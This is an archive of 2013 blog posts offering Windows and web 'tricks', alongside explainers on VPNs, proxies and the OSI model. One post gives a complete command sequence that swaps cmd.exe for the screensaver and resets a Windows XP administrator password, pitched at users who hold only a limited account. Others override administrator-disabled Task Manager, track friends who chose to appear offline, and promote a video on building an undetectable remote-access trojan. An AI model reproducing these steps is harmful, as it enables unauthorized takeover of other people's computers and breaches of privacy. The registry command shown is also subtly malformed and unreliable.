Saturday, August 31, 2013

How to prevent your blogger blog from redirecting to country specific domains.

Google generally redirects its blogger blogs to country specific domains. It means when you will try to open a blog named  xyz.blogspot.comin your internet browser then if you are browsing from India then you may be redirected to xyx.blogspot.in. If browsing from UK then it will be like xyz.blogspot.co.uk  .


This is done by Google due to prohibition of some content in those countries. By this method they can easily block any website or blog or some part of it in that particular country or some part of that region.
Following are some countries where blogger does this:

India(blogspot.in),Mexico(blogspot.mx),Australia(blogspot.co.uk),Argentina (blogspot.com.ar),UK(blogspot.co.uk),Brazil(blogspot.com.br),Japan(blogspot.jp),            Portugal (blogspot.pt),NewZealand(blogspot.co.nz),Spain(blogspot.com.es),Canada (blogspot.ca),Sweden (blogspot.se),Italy (blogspot.it),France (blogspot.fr)

There are many disadvantages for country specific domains. Your website or blog traffic will be different from different places of the world. Your social medial followers will be different from different places. So we should avoid country specific domains. In you blogger blog you after change in some html code you can prevent blogger from redirecting to country specific domains. Just go to template --> edit html -->proceed. Now paste the following code after <head>tag:

<script type="text/javascript">
var blog = document.location.hostname;
var slug = document.location.pathname;
var ctld = blog.substr(blog.lastIndexOf("."));
if (ctld != ".com") {
var ncr = "http://" + blog.substr(0, blog.indexOf("."));
ncr += ".blogspot.com/ncr" + slug;
window.location.replace(ncr);
}
</script>

Save the template and now your blog will always operate on blogspot.com url.

Find invisible (offline ) people on Facebook chat who are in fact online on Facebook

Many times your friends keep themselves offline to hide from you on facebook chat. You send messages but no reply. Now I have two methods to know that they are really offline or just ignoring your messages. So use any of the following two methods and know the secret of our friends:-
Method 1: -  
There is a facebook application named ‘Online now’. Using this application you can know without being online on facebook chat who is online on chat, no matter in visible or invisible mode.

Method 2:-  

For this you need to use ‘Texas Hold’Em Poker’ application .The only condition is that the person you want to verify must have used this application at least once. If the poker application has access to that person’s profile then it will show whether he is online but not playing poker. Even people who are offline on facebook chat are mentioned here. So invite all your friends to play poker so that it will be easy to find status of anyone of them.

How to install windows XP in less than 15 minutes

Microsoft windows XP operating system generally takes 40 minutes to install. We can reduce the installation time to approximately 15 minutes. Use the following steps and enjoy fast installation:-


How to install windows XP in less than 15 minutes
  1. Start booting from windows XP disk.
  2. After copying all the files by setup which are required for installation of windows xp, it will prompt to indicate a location to install the operating system (OS).
  3. After selecting the drive, the setup would format and reboot.
  4. During reboot, installation will start and the screen will tell that you require around 40 minute completing the setup.
  5. Now press Shift + F 10 . Command prompt will open. Type “taskmgr “(without quotes) .it will open up the task manager.
  6. In the task manager, click the process tab and search for a process named Setup.exe.
  7. Right click the process and set its priority to “High”.
Congratulations!! Now installation will be faster and will complete within 15 minutes approx.

How to hack windows XP admin password

How to hack windows XP admin password


If you are given access to the limited account only on a system. Then definitely you can’t access many features of that pc. But, don’t worry I have a trick to hack the admin password of that pc. At first open up a dos prompt then follow these sets of commands:
cd\ *drops to root
cd\windows\system32 *directs to the system32 dir
mkdir temphack *creates the folder temphack
copy logon.scr temphack\logon.scr *backsup logon.scr
copy cmd.exe temphack\cmd.exe *backsup cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos
Now what you have just done is told the computer to backup the command program and the screen saver file, then edits the settings so when the machine boots the screen saver you will get an unprotected dos prompt without logging into XP. Once this happens if you enter this command minus the quotes
"net user <admin account name here> password"
If the Administrator Account is called Peter and you want the password Alex enter this
"net user Peter Alex"
This will change the password on Peter machine to Alex and no you have full access to this computer. So enjoy it.

All in one source code editor : Notepad++

All in one source code editor : Notepad++

Hello friends! Use this new free source code editor .Now gone are the days when we have to purchase different source code editor for different programming language. Notepad++ is a free source code editor which is all in one. It supports many programming languages such as HTML,CSS,C++, JavaScript, and even Actionscript. This source code editor has many exciting features. It has code highlighting and hinting which is vey helpful. Following are the main features of Notepad++ :
  1. Syntax Highlighting and Syntax Folding.
  2. User defined Syntax Highlighting and Folding.
  3. PCRE (Perl Compatible Regular Expression) Search/Replace.
  4. GUI entirely customizable: minimalist, tab with close button, multi-line tab, vertical tab and vertical document list.
  5. Document map
  6. Auto-completion: Word completion, Function completion and Function parameters hint.
  7. Multi-Document (Tab interface)
  8. Multi-View
  9. WYSIWYG (Printing)
  10. Multi-Language environment supported.
  11. Bookmark
  12. Macro recording and playback. 
So, Notepad++is a source code editor and MS Windows notepad replacement. It is based on a powerful editing component Scintilla. Notepad++ is written in C++ and uses pure Win 32 API and STL which ensures higher execution speed and smaller program size. It optimizes as many routines as possible, without losing user friendliness. 



By using less CPU power this source code editor is trying to reduce world carbon dioxide emission. During using less CPU power, the pc can throttle down and reduce power consumption, resulting in a greener environment. You can download this free source code editor from HERE

PROCESS EXPLORER

PROCESS EXPLORER : THE MOST POWERFUL WINDOWS TASK MANAGER REPLACEMENT


Many times you will feel difficulty in understanding and managing the processes running on your computer. Because windows task manager is not suitable for every functions. Even in the most improved version Windows 8, it is not comparable with Process explorer. It is among the most powerful system utilities for windows.

Process Explorer shows you information about which handles and DLLs processes have opened or loaded. The Process Explorer display consists of two sub-windows. The top window always shows a list of the currently active processes, including the names of their owning accounts, whereas the information displayed in the bottom window depends on the mode that Process Explorer is in: if it is in handle mode you'll see the handles that the process selected in the top window has opened; if Process Explorer is in DLL mode you'll see the DLLs and memory-mapped files that the process has loaded. Process Explorer also has a powerful search capability that will quickly show you which processes have particular handles opened or DLLs loaded.
The unique capabilities of Process Explorer make it useful for tracking down DLL-version problems or handle leaks, and provide insight into the way Windows and applications work.
Apart from this it has following features:
  1. Search online
  2. Detailed process properties
  3. Detailed Resource usage information
  4. Unlock locked files
  5. Replace the windows Task Manager
  6. Find a window’s process
So Hurry!! Get this powerful Process Explorer. Click here to download.

How to block and unblock websites on your computer

How to block and unblock websites on your computer


If you want to blockand unblock websites then I have a trick to do it without using any software.so follow these steps and do what you want with a particular websites: 
To block a website 
          
          1.       Click start Button then click “Run"
          2.       Type the following command in the “run” then press “ok”
                  notepad %windir%\system32\drivers\etc\hosts 
          3.       A pop up window of notepad will open 
          4.       Suppose you want to block the website facebook.com  then add  
                 127.0.0.1       facebook.com     as shown in pic below 
          5.       Now press CTRL+S to save the file. 
          6.       Restart the internet browser.
In this way you have blocked facebook.com on your computer. Replace it with any website address and you will be able to block that website.
To unblock a website

          1.       Repeat from step 1 to step 3 as mentioned above. 
          2.       Now delete  127.0.0.1       facebook.com   from pop up window of notepad. 
          3.       Now press CTRL+S to save the file.
          4.       Restart the internet browser.
Now you have unblocked facebook.com on your computer.

How to install two OS

How to dual boot Windows 7 and Windows 8


If you want to enjoy two operating systems in one pc then dual boot Windows 7 and Windows 8is for you. By using my trick you will be able to choose between Windows 7 and Windows 8 at the boot time. By choosing options you will be able to use anyone of the two operating systems. So for this dual boot follow these steps:
1.     At first install Windows 7 if it is not installed on your system. If it is installed then move to step 2 directly.
2.    Back up your all important documents. Because if any fault happens then your documents will be safe.
3.    Go to the Control Panel >  Administrative Tools > Computer Management > Disk Management
4.      Find the drive on which Windows 7 is installed. Right click on it > click Shrink Volume
5.    A pop up window will open. Enter 50 GB. If disk management denies shrinking volume then it is advised to use any third party tool as like Paragon’s Hard Disk Manager.
6.   After shrinking the volume you will get a black “unallocated “ space at the end of the drive. Now right click mouse button on it and select New simple volume. Now give a name to this new volume. You can keep its name “Windows 8”. Wait for some time to format a new partition.
7.   Now reboot the system with Windows 8 DVD, start installing windows 8. Choose option of Custom install. Now choose the volume named “windows 8“ to install on it. Now click next.
8.      Now install windows 8 fully.
9.    After rebooting your system now you will get dual boot menu. Now you can select any one of windows 7 or windows 8. If you will not choose any then by default Windows 8 will load after few seconds. You can change this default option by clicking on the option at the bottom of menu screen “change defaults or choose other options”.

Sign in with a picture password

Sign in with a picture password in windows 8 and windows RT


Now we can use Picture password in windows 8 and windows RT .it can make your PC more personal and secure. You can draw picture and shapes on a touchscreen or you can use mouse to draw. Picture password is hard to hack .because shapes and pictures combination can be infinite. 
So follow these steps and set up a picture password in your PC:

1.       From the Settings charm click Change PC settings >click Users.
2.       Under Sign-in options  click Create a picture password > follow the on-screen instructions.
3.       If you don't see this option, check with your system administrator or see Why can't I create a picture password?
Some warnings to keep in mind:
1.   Don't make a picture password very harder. Use simple photos shapes that are easy to remember and to draw.
2.   A picture password is limited to three gestures, and these must be some combination of circles, straight lines, and taps. So, keep it simple.
In this way you can easily sign in with picture password in windows 8 and windows RT.

Your pc will speak what you type

Your pc will speak what you type


Now your pc will speak what you type. I have this unique trick for you. This trick works best on Microsoft operating systems. So follow these steps:
1.    Just copy the following code, paste it in notepad.
Dim message, sapi
message=InputBox("What do you want me to say?","Speak to Me")
Set sapi=CreateObject("sapi.spvoice")
sapi.Speak message
2.    Now save this notepad file with the name speak.vbs on your desktop.
3.    Now double click on speak.vbs and type in the box whatever you want your computer to speak for you.
4.    After type press ok button. Now your computer will speak in English what you have typed.

How to enable Task Manager

How to enable Task Manager disabled by Administrator or Virus

In this post I will tell you How to enable Task Manager disable by Administrator or Virus . Windows Task Manager is a very useful utility in windows operating system. By using it you can easily view the details of all the processes running on your computer. You can also close any process by Task Manager which is not closed otherwise . but sometimes some viruses disable Task manager so that you can’t terminate them. In some cases Administrator disable this feature to stop unnecessary change in the processes running in their computer.

But I have a trick by which you can enable it again. So follow this trick given below :

Enable task Manager by running a CMD command

  • Open notepad
  • Copy the following code and paste it in notepad
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System  /v  DisableTaskMgr  /t REG_DWORD  /d /0 /f
  • Now save this file and name it TaskManager.bat
  • Now you have to run this file as Administrator if you are a Windows 8 or Windows 7 or Windows vista user . if you use windows xp then simply open this file.
  • CMD will flash for a second and then it will disappear . it means that it is successfully executed.
  • Now start Task Manager if it doesn’t open then restart your computer
In this way you have enabled Task Manager disabled by Administrator or any virus.

how to remove virus without using antivirus

how to remove virus without using antivirus / remove virus using command prompt




In this post I will tell you how to remove virus from your computer using command prompt only. Generally for removing viruses from computer we use antivirus program. But I have a trick by which you can delete viruses from your computer without antivirus by just using command prompt. So follow these steps to do it :

  1. At first open command prompt. For this press "windows+r " key and write cmd then press enter or you can simply write "cmd" in search box after clicking start button.
  2. Now type in the command prompt [drive_letter]: and press enter. suppose if you want to search "D" drive for viruses then you have to type like this in command prompt  d:   and now press enter.
  3. You have entered in the D drive . Now we will see all the files in this drive including hidden file. For this type dir /w/a  in the command prompt and press enter key. It will show the list of all the files in this drive.
  4. Now you have to identify autorun.inf and .exe files in the directory. these may be viruses if they are not softwares saved by you in those drives.
  5.  Now use the command  -r -a -s -h  to remove the attributes of all the files in the directory.
  6.  For deleting the autorun file type del autorun.inf and press enter.
  7. Suppose you found the virus named xyz.exe then to delete it type the command del xyz.exe  and press enter.
  8.  In this way you have deleted the virus . But in some cases the virus resides in the Recycler folder . You will have to go to recycler folder to delete it. So type cd recycler and press Enter.
  9.  Now check this recycler folder by typing the command dir /w/a
  10. If you find here again autorun.inf or xyz.exe type files then use the command  -r -a -s -h  to remove the attributes of all the files in the directory.
  11.  Again delete the infected files by the command del autorun.inf and del zyz.exe
In this way you have successfully deleted virus from your computer using command prompt.

Trace a location from an IP address

Trace a location from an IP address

Trace-a-location-from-an-IP-address
Trace a location from an IP address :-
Every device connected to the public Internet is assigned a unique number known as an Internet Protocol (IP) address. IP addresses consist of four numbers separated by periods (also called a ‘dotted-quad‘) and look something like 192.168.0.1.
Since these numbers are usually assigned to internet service providers within region-based blocks, an IP address can often be used to identify the region or country from which a computer is connecting to the Internet. An IP address can sometimes be used to show the user’s general location.
There are many situations that you are curious to know the location of particular IP-address, like if you are website admin, it,s important for you to find out the location of your visitors or some time you need to be find out the location of particular website server Geo-location.
If you want to view own public IP-address. just enter the my ip in google search. it will show you your IP-address.
Trace-a-location-from-an-IP-address1
Today i am going to show you How to Trace a location from an IP address ?
1. whatismyipaddress.com
whatismyipaddress.com is really good service to identify the ISP , organization , Service , city , Region and country.
Trace-a-location-from-an-IP-address1
2. www.infosniper.net
This includes a choice of Google Maps, Microsoft Maps or Yahoo Maps to show the location. You also get country, state/county, latitude/longitude, host name, provider and other things like area or postal codes are also sometimes available. InfoSniper can get down to an accuracy of your town or city not just where your ISP is located and there’s some helpful links to search Wikipedia for more details about the location the address is coming from.
Trace-a-location-from-an-IP-address1
3. www.iptrackeronline.com
This one is really nice service that will show more detailed location about IP-address. like my current address is 11 King fahad street and it,s showing same.
Trace-a-location-from-an-IP-address1
Enjoy the location of IP-address.
Hope you like my post.Trace a location from an IP address. Please Share with others.

Wednesday, August 28, 2013

Surf youtube videos without buffering



Surf youtube videos without buffering

Hi friends,
As you know Youtube is the best online Video Surfing site.Many of them have Slow Internet connection which u need to wait till it loads or you choose to download it.But there are many alternative ways to surf videos.You can maximum surf the videos without buffering.



I'll explain you some of the step by step so that you can save loading time.Login into Your Youtube Accounts

The Alternative methods are:


  1. HTML 5
  2. Feather beta
  3. Reduce the Video Resolution
  4. Changing DNS



1.HTML 5:- HTML 5 is one of the best alternative which supports all major browsers.
So 1st You need need to enable HTML 5 Player in youtube .
GO to http://www.youtube.com/html5 and Click on " Join the HTML 5 trail "

Once you Join the HTML 5 it appears like the below picture.



2.Feather Beta: Feather Beta is the 2nd alternative to watch Buffer-free videos online.
Go to http://www.youtube.com/feather_beta
Click on join the "Feather" beta.


You can leave the page when it appears " Leave the Feather beta".

Also See: Watch 18+ Youtube Videos without Sign in

3.Reduce the Video Resolution: Set the resolution according to low depends on your internet speed.Choose ' Never play high-quality video '.



4. Change DNS Server: Choose your connection. Right Click On ' status ' Then a box appears as shown in picture.



Then Click on ' Internet Protocol version 4 ' twice or Click once and choose Properties.




In the below Column, Preferred and  Alternate DNS Servers appears.Configure or Replace the values with 
Preferred DNS Server: 8.8.4.4
Alternate DNS Server: 8.8.8.8 

Note :If you Have any values in that place note it down somewhere and enter this values. In case of No internet appears. You can enter the old values you have noted.
Then Click On 'Ok ' and you can even see the change in Internet Speed also while browsing by entering these values.

Hence these are the possible ways to watch youtube videos without buffering.Hope you like the Post.

Saturday, August 24, 2013

How to do VPN [Virtual private network] Tunneling


How to do VPN [Virtual private network] Tunneling

Virtual private network technology is based on the idea of tunneling. VPN tunneling involves establishing and maintaining a logical network connection (that may contain intermediate hops). On this connection, packets constructed in a specific VPN protocol format are encapsulated within some other base or carrier protocol, then transmitted between VPN client and server, and finally de-encapsulated on the receiving side.

For Internet-based VPNs, packets in one of several VPN protocols are encapsulated within Internet Protocol (IP) packets. VPN protocols also support authentication and encryption to keep the tunnels secure.
Types of VPN Tunneling
VPN supports two types of tunneling - voluntary and compulsory. Both types of tunneling are commonly used.

In voluntary tunneling, the VPN client manages connection setup. The client first makes a connection to the carrier network provider (an ISP in the case of Internet VPNs). Then, the VPN client application creates the tunnel to a VPN server over this live connection.

In compulsory tunneling, the carrier network provider manages VPN connection setup. When the client first makes an ordinary connection to the carrier, the carrier in turn immediately brokers a VPN connection between that client and a VPN server. From the client point of view, VPN connections are set up in just one step compared to the two-step procedure required for voluntary tunnels.

Compulsory VPN tunneling authenticates clients and associates them with specific VPN servers using logic built into the broker device. This network device is sometimes called the VPN Front End Processor (FEP), Network Access Server (NAS) or Point of Presence Server (POS). Compulsory tunneling hides the details of VPN server connectivity from the VPN clients and effectively transfers management control over the tunnels from clients to the ISP. In return, service providers must take on the additional burden of installing and maintaining FEP devices.
VPN Tunneling Protocols
Several computer network protocols have been implemented specifically for use with VPN tunnels. The three most popular VPN tunneling protocols listed below continue to compete with each other for acceptance in the industry. These protocols are generally incompatible with each other.

Point-to-Point Tunneling Protocol (PPTP)

Several corporations worked together to create the PPTP specification. People generally associate PPTP with Microsoft because nearly all flavors of Windows include built-in client support for this protocol. The initial releases of PPTP for Windows by Microsoft contained security features that some experts claimed were too weak for serious use. Microsoft continues to improve its PPTP support, though.


Layer Two Tunneling Protocol (L2TP)

The original competitor to PPTP for VPN tunneling was L2F, a protocol implemented primarily in Cisco products. In an attempt to improve on L2F, the best features of it and PPTP were combined to create a new standard called L2TP. Like PPTP, L2TP exists at the data link layer (Layer Two) in the OSI model -- thus the origin of its name.

Internet Protocol Security (IPsec)

IPsec is actually a collection of multiple related protocols. It can be used as a complete VPN protocol solution or simply as the encryption scheme within L2TP or PPTP. IPsec exists at the network layer (Layer Three) of the OSI model.

Watch our latest video : How to create a FUD RAT Server :





Thursday, August 22, 2013

>>Proxy servers:-


Its allow for you to configure your browser to route your browser traffic through that machine, which then makes a request for a page on your behalf, and then sends you the results. These are usually used at no cost to the user. Since they are accessible to the public these are often quite slow. Please see instructions for using a proxy server.

There are a variety of types of these proxy servers:

* Transparent Proxy - This type of proxy server identifies itself as a proxy server and also makes the original IP address available through the http headers. These are generally used for their ability to cache websites and do not effectively provide any anonymity to those who use them. However, the use of a transparent proxy will get you around simple IP bans. They are transparent in the terms that your IP address is exposed, not transparent in the terms that you do not know that you are using it (your system is not specifically configured to use it.) This type of proxy server does not hide your IP address.

* Anonymous Proxy - This type of proxy server identifies itself as a proxy server, but does not make the original IP address available. This type of proxy server is detectable, but provides reasonable anonymity for most users. This type of proxy server will hide your IP address.

* Distorting Proxy - This type of proxy server identifies itself as a proxy server, but make an incorrect original IP address available through the http headers. This type of proxy server will hide your IP address.

* High Anonymity Proxy - This type of proxy server does not identify itself as a proxy server and does not make available the original IP address. This type of proxy server will hide your IP address.




>>Proxy browser:-


A proxy server acts as a security barrier between your internal network and the Internet, keeping others on the Internet from being able to obtain access to information that is located on your internal network.........and your browser is become like invible........its hide your ip. like you use china country proxy den open google.com now google will open in china language form............!~


How to change proxy settings in Browsers


@ Mozilla Firefox

1. Open Mozilla Firefox.

2. Click on Tools then click on Options….

3. Click on the Advance tab, then click on the Network sub-tab and finally on the Settings… button.

4. Tick the Manual Proxy Configuration: radio button.

5. In the HTTP Proxy: box, type the IP address of the proxy server.

6. In the Port: box, type the in the port number that is used by the proxy server.

7. Click OK to close the Connection Settings window.

8. Click OK to close the Options window.

9. DONE




@ Internet Explorer
1. On the Tools menu in Internet Explorer, click Internet Options, click the Connections tab, and then click LAN Settings.
2. Under Proxy server, click to select the Use a proxy server for your LAN check box.
3. In the Address box, type the IP address of the proxy server.
4. In the Port box, type the port number that is used by the proxy server for client connections (by default, 8080).
5. You can click to select the Bypass proxy server for local addresses check box if you do not want the proxy server computer to be used when you connect to a computer on the local network (this may speed up performance).
6. Click OK to close the LAN Settings dialog box.
7. Click OK again to close the Internet Options dialog box.



@ proxy settings In Google Chrome.

* To change proxy settings: Click "Customize and control Google Chrome" icon right under the "window close" button.
* A popup menu will be dipslayed. Click "Options".
* Select the "Under the Hood" tab.
* Scroll down and Click "change proxy settings" button.
* A popup dialog will be display. Select the Connections tab on this dialg.
* If you are using LAN, click "LAN Settings" button. If you are using Dial-up or Virtual Private Network connection, select necessary connection and click "Settings" button.
* Make sure the "automatically detect proxy settings" and "use a proxy automatic configuration script" options are not checked.
* In the "Proxy Server" area, click the check box next to Use a proxy server for this connection.
* If nessesary, enable "bypass proxy server for local addresses".
* Click the "Advanced" button and set Proxy Server address (proxy IP), proxy server port.
* Click OK.

*done



@ proxy settings in Safari.
* To change proxy settings: Open Safari
* Click Safari on top of the screen.
* Click "Preferences".
* In the menu bar at the top of the window, Click "Advanced".
* Click on the "Change Settings" button next to the Proxies label
* Click on the check box button next to Web Proxy (HTTP)
* Enter proxy server and port information
* Select "Apply Now" to save settings.
* Done.

Friday, August 16, 2013

The OSI Model’s Seven Layers Defined and Functions Explained

The-OSI-Model's-Seven-Layers-Defined-and-Functions-Explained
The OSI Model’s Seven Layers Defined and Functions Explained :-
When networks first came into being, computers could typically communicate only with computers from the same manufacturer. For example, companies ran either a complete DECnet solution or an IBM solution — not both together. In the late 1970′s, the Open System interconnection (OSI) reference model was created by the International Standard of Organization (ISO) to break this barrier.
The ultimate aim of the OSI reference model is to break down the task of data communication into easily manageable steps.
” A reference model is a conceptual blueprint of how communications should take place. it addresses all the processes required for effective communication and divides these processes into logical grouping called layers. ”
The seven Layers of the OSI Model :-
  • Application Layer
  • Presentation Layer
  • Session Layer
  • Transport Layer
  • Network Layer
  • Data-Link Layer
  • Physical Layer
The purpose of each layer in the OSI reference model is to provide service to the next layer above it while shielding the upper layer from the complications of the layer below it. The higher layers do not need to know how the data came there or what kinds of technologies were used at the lower layers.
The-OSI-Model's-Seven-Layers-Defined-and-Functions-Explained1
Application Layers :- The Application layer of the OSI model marks the spot where users actually communicate to the computer. The purpose of this layer is to manage communication between the applications and end-user processes.
This is the layer through which applications receive and request data.
The-OSI-Model's-Seven-Layers-Defined-and-Functions-Explained2
Prime examples are file transfers and email, as well as enabling remote access, network management activities, client/server processes and information locations.
Layer 7 protocols (Application Layer) :-
BitTorrent, BGP ,BOOTP , DNS,  DHCP , FTP , HTTP, HTTPS, IMAP, LDAP , MIME , NetBIOS , NNTP, NTP, POP3  , RADIUS , RDP, RTP, RTSP , SSH , SIP , SMTP, SNMP, SMB, Telnet, TFTP,
Presentation Layer :- 
The presentation layer is the layer below the Applicaiton layer and above the Session layer. The presentation layer gets it,s name from it,s purpose: it presents data to the Application layer and is responsible fordata translator and code formatting.
Presentation-layer-presentation
The Primary function of this layer is to define data formats such as text , ASCII text , Binary and Jpeg.
The presentation layer adds structure to the packets of the data that are being exchanged and ensures that the message gets transmitted in a format or syntax that the receiving system is able to understand.Data Encryption is also defined by the presentation layer.
3. Session Layer
The session layer is responsible for settings up, managing, and then tearing down sessions between Presentation layer entities. This layer also provides dialog control between devices, or nodes.
The Session layer define how to start/establish a connection, how to use and control a connection and how to break down the connection when a session is complete.
Example :-
Your web browser (an application layer object) opens a web page. That page contains text, graphics, Macromedia Flash objects and perhaps a Java applet. The graphics, the Flash object and the Java applet are all stored as separate files on the web server. To access them, a separate download must be started. Your web browser opens a separate session to the web server to download each of the individual files. The session layer keeps track of which packets and data belong to which file and keeps track of where they go (in this case, to your web browser).
Protocols Used on Session Layer :-
NFS ( Network File System) , SMB Server Message Block and SOCKS ”SOCKetS”
4. Transport Layer
In the Open Systems Interconnection (OSI) communications model, the Transport layer ensures the reliable arrival of messages and provides error checking mechanisms and data flow controls. The Transport layer provides services for both “connection-mode” transmissions and for “connectionless-mode” transmissions. For connection-mode transmissions, a transmission may be sent or arrive in the form of packets that need to be reconstructed into a complete message at the other end.
The most well-known transport protocol is the Transmission Control Protocol (TCP). It lent its name to the title of the entire Internet Protocol Suite, TCP/IP. It is used for connection-oriented transmissions, whereas the connectionless User Datagram Protocol (UDP) is used for simpler messaging transmissions. TCP is the more complex protocol, due to its stateful design incorporating reliable transmission and data stream services. Other prominent protocols in this group are the Datagram Congestion Control Protocol (DCCP) and the Stream Control Transmission Protocol (SCTP).
Protocol Used on the Transport Layer :-
AH (Authentication Header over IP or IPSec ) , ESP ( Encapsulating Security Payload over IP or IPSec ) ,GRE (Generic Routing Encapsulation for tunneling) , SCTP ( Stream Control Transmission Protocol) , TCP ( Transmission Control Protocol )  and UDP ( User Datagram Protocol )
5. Network Layer :-
The network layer ( also called layer 3 ) manages device addressing, tracks the location of devices on the network, and determines the best way to move data, which means that the network layer must transport traffic between devices that aren’t locally attached. Routers ( layer 3 devices ) are specified at the network layer and provide the routing services within an inter-network.
In addition, the Network layer defines how to fragment a packet into smaller packets so that it can be accommodated in the transmission media with smaller MTU (maximum transmission unit) sizes.
Used Protocols on Network Layer :- 
EIGRP ( Enhanced Interior Gateway Routing Protocol ) ,ICMP( Internet Control Message Protocol ) , IGMP  (Internet Group Management Protocol ) , IPv4 ( Internet Protocol version 4 ) ,  IPv6 ( Internet Protocol version 6 ) , IPSec  ( Internet Protocol Security)
6. Data Link Layer :-
The Data Link layer provides the physical transmission of the data and handles error notifications, network topology, and flow control. This means that the Data Link Layer will ensure that messages are delivered to the proper device on a LAN using hardware addresses and will translate the messages from the Network layer into bits for the Physical layer to transmit.
The Data link layer formats the message into pieces, each called adata frame, and adds a customized header containing the hardware destination and source address.
The Data-Link Layer is composed of two sub-layers :-
  • Logical Link Control ((LLC) sub layer
  • Media Access Control ( MAC) sub layer
datalinklayerexplained
7. Physical Layer :-
The physical layer is special compared to the other layers of the model, because it is the only one where data is physically moved across the network interface. All of the other layers perform useful functions to create messages to be sent, but they must all be transmitted down the protocol stack to the physical layer, where they are actually sent out over the network.
The OSI Model Animation :- 
Note :- Mnemonics to remember the Seven Layers of OSI Reference Model
From Top to Bottom :- All People Seem TNeed Data Processing
From Bottom to Top :- Please DNot Take Sales Persons Advice
Hope you Like my post.The OSI Model’s Seven Layers Defined and Functions Explained. Please Share with others